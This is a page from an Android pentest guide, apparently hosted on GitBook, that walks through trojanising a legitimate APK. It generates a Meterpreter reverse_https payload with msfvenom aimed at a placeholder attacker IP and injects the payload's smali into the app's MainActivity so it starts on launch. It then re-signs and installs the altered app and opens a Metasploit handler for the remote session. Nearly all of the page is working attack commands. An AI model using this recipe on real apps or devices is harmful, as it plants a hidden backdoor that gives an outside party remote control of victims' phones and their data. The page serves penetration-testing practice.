[A]ndroid [A]pplication [P]entest [G]uide
  • AAPG
  • 1. MANUAL STATIC ANALYSIS
    • 1.1 Decompile APK
    • 1.2 Check certificate
    • 1.3 Analyze AndroidManifest.xml
    • 1.4 Source Code Analysis
  • 2. AUTOMATED STATIC ANALYSIS
  • 3. MANUAL DYNAMIC ANALYSIS
    • 3.1 Install application & use it
    • 3.2 Bypass detections
    • 3.3 Analyze local storage
    • 3.4 Attack surface
      • 3.4.1 Activities
      • 3.4.2 ContentProvider
      • 3.4.3 Services
    • 3.5 Log analysis
    • 3.6 More HOW and WHAT! (still work in progress)
  • 4. APK TAMPERING
    • 4.1 DIY - Simple Reverse Meterpreter (Non-Xamarin)
    • 4.2 Quick Proof-of-Concept (Meterpreter)
Powered by GitBook
On this page
  • Create Payload
  • Tampering
  • START APPLICATION ON DEVICE AND HAVE FUN!!! ;)
  • INFO

Was this helpful?

  1. 4. APK TAMPERING

4.1 DIY - Simple Reverse Meterpreter (Non-Xamarin)

Create Payload

msfvenom -p android/meterpreter/reverse_https LHOST=<ATTACKER-IP> LPORT=<ATTACKER-PORT> -o meterpreter.apk

Tampering

Decompile meterpreter.apk & original app_name.apk

apktool d -f -o ./payload_apk /path/to/your/meterpreter.apk
apktool d -f -o ./original_apk /path/to/your/app_name.apk

Add folder to original project:

mkdir ./original_apk/metasploit; mkdir ./original_apk/metasploit/stage

Copy payload files:

cp ./payload_apk/smali/com/metasploit/stage/* ./original_apk/smali/metasploit/stage/

Get MainActivity name:

  • In some cases the default name is already "MainActivity"

  • Search AndroidManifest.xml for an <activity>-tag which contains both:

    • <action android:name="android.intent.action.MAIN"/>

    • <category android:name="android.intent.category.LAUNCHER"/>

    • Look out for the tag-parameter: android:name="core.MainActivity" (it can have a different name, core indicates a directory within the smali directory)

Modify MainActivity.smali

  • Search for:

    • ;->onCreate(Landroid/os/Bundle;)V

  • Add another line (following the line above) and paste:

    • invoke-static {p0}, Lcom/metasploit/stage/Payload; ->start(Landroid/content/Context;)V

Add all necessary app permissions from ./meterpreter/AndroidManifest.xml into the original ./original_apk/AndroidManifest.xml

  • Check for duplicates

  • If some permissions are missing, some meterpreter functions will not work

Recompile:

apktool b ./original_apk

Sign apk (key-creation + signing):

 keytool -genkey -v -keystore my-release-key.keystore -alias myalias  -keyalg RSA -keysize 2048 -validity 10000
/home/<user>/Android/Sdk/build-tools/<27.0.3_OR_CHECK_YOUR_USED_VERSION>/apksigner sign --ks my-release-key.keystore ./original_apk/dist/app_name.apk

Install modified apk

adb install /path/to/app_with_backdoor.apk

Start meterpreter session handler (use same IP & port as you used to generate the payload above):

msfconsole
use multi/handler
set payload android/meterpreter/reverse_https
set LHOST <ATTACKER-IP>
set LPORT <ATTACKER-PORT>
run

START APPLICATION ON DEVICE AND HAVE FUN!!! ;)

INFO

  • The guide I excerpted

Previous4. APK TAMPERINGNext4.2 Quick Proof-of-Concept (Meterpreter)

Last updated 5 years ago

Was this helpful?